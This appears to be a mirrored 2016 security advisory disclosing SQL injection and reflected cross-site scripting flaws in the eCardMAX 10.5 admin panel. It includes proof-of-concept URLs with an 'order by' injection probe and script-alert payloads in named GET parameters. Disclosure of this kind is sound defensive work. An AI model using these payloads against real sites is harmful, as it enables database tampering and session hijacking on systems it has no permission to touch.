Lucene search

K

eCardMAX 10.5 Multiple Vulnerabilities

🗓️ 01 Jul 2016 00:00:00Reported by Bikramaditya GuhaType 
zeroscience
 zeroscience
🔗 zeroscience.mk👁 26 Views

eCardMAX 10.5 SQL Injection and Cross-Site Scripting Vulnerabilitie

Show more
Code
<html><body><p>eCardMAX 10.5 Multiple Vulnerabilities


Vendor: eCardMAX.COM
Product web page: http://www.ecardmax.com
Affected version: 10.5
Platform: PHP

Summary: eCardMax is the most trusted, powerful and dynamic online
ecard software solution. It enables you to create your own ecard
website with many of the advanced features found on other major
sites. Starting your own ecard website with eCardMax is fast and easy.

Desc: eCardMAX suffers from a SQL Injection vulnerability. Input passed
via the 'row_number' GET parameter is not properly sanitised before being
returned to the user or used in SQL queries. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code. Multiple cross-site
scripting vulnerabilities were also discovered. The issue is triggered when
input passed via multiple parameters is not properly sanitized before being
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.

Tested on: Apache/2.2.26
           PHP/5.3.28
           MySQL/5.5.49-cll


Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
                            @zeroscience


Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php


13.06.2016

--


1. SQL Injection:

Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&amp;what=&amp;row_number=10%20order%20by%201--&amp;search_year=2016&amp;page=2

------------------

2. Cross Site Scripting (Reflected):

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&amp;search_field=all&amp;keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&amp;cmd_button=Search+User
Parameter(s): keyword (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&amp;row_number=15&amp;page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&amp;what=&amp;row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&amp;search_year=2016&amp;page=2
Parameter(s): row_number (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&amp;what=&amp;row_number=15&amp;what2=&amp;cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&amp;list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&amp;search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&amp;keyword=&amp;num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&amp;num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&amp;from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&amp;from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&amp;from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&amp;to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&amp;to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&amp;to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&amp;page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page  (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&amp;search_field=user_name_id&amp;cmd_button=Search+User&amp;keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)
</p></body></html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo